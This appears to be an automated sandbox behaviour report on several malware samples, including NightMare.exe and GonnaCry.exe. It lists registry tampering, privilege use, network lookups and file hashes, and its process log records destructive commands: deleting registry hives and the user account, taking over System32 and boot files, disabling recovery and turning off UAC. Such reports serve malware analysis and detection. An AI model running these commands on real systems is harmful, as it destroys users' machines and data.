| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4743).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5750).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1325).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2624).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Hand = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Help = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\No = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\ = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Wait = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3045580317-3728985860-206385570-1000\{F40EF9B6-22AB-4520-B606-11D985A58B11} | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NightMare.exe
"C:\Users\Admin\AppData\Local\Temp\NightMare.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
C:\Windows\SysWOW64\net.exe
net user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKCR
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\reg.exe
reg delete HKLM
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKU
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\taskmgr.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\LogonUI.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\BCD
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\drivers
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\System32\WUDFHost.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/32-0-0x0000000000060000-0x0000000000070000-memory.dmp
memory/32-1-0x0000000074DC0000-0x0000000075570000-memory.dmp
memory/32-2-0x00000000050A0000-0x0000000005644000-memory.dmp
memory/32-3-0x0000000004A40000-0x0000000004AD2000-memory.dmp
memory/32-4-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-5-0x0000000004B10000-0x0000000004B1A000-memory.dmp
C:\Users\Admin\Videos\Captures\desktop.ini
| MD5 | b0d27eaec71f1cd73b015f5ceeb15f9d |
| SHA1 | 62264f8b5c2f5034a1e4143df6e8c787165fbc2f |
| SHA256 | 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2 |
| SHA512 | 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 21ad42bd4156f914d3a265823a1c269c |
| SHA1 | 4129bc994a0947b38e3bac2aeabc8e2fbdbd503f |
| SHA256 | 680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2 |
| SHA512 | 7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a |
memory/32-7955-0x0000000074DC0000-0x0000000075570000-memory.dmp
memory/32-10464-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-120019-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-120041-0x0000000004B90000-0x0000000004BA0000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\REGFuck.bat"
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win7-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
141s
Max time network
120s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe"
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
"C:\Users\Admin\AppData\Roaming\1337\Frog.exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
Files
\Users\Admin\AppData\Local\Temp\nst1383.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
\Users\Admin\AppData\Roaming\1337\Frog.exe
| MD5 | 41e75c80873b0ca18d56ddaba4c5aadd |
| SHA1 | 1d0423d6e66a4739db22939e1c16bcdc7eaa9746 |
| SHA256 | b7d4eef3fa0244a3618b3d60eab9a3ebaf1f8ec5cce9598d37e99b9d7a988cec |
| SHA512 | 402de19c72015fefefe02347fad8907762c991538c4ef7aa6b646c90d6fd7aadadcdb8be9f03d78a1b7cec712516faa318fde738b52dfa7b3aaa34219f2d1530 |
memory/2552-15-0x00000000001C0000-0x00000000001C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\1337\php5ts.dll
| MD5 | c9aff68f6673fae7580527e8c76805b6 |
| SHA1 | bb62cc1db82cfe07a8c08a36446569dfc9c76d10 |
| SHA256 | 9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4 |
| SHA512 | c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56 |
memory/2552-21-0x0000000003460000-0x0000000003461000-memory.dmp
memory/2584-22-0x0000000002D90000-0x0000000002D91000-memory.dmp
memory/2552-23-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2552-25-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/2552-26-0x0000000003460000-0x0000000003461000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe
"C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
memory/3316-0-0x000001C48C460000-0x000001C48C56E000-memory.dmp
memory/3316-1-0x00007FFA7DA20000-0x00007FFA7E4E1000-memory.dmp
memory/3316-2-0x000001C4A6AC0000-0x000001C4A6AD0000-memory.dmp
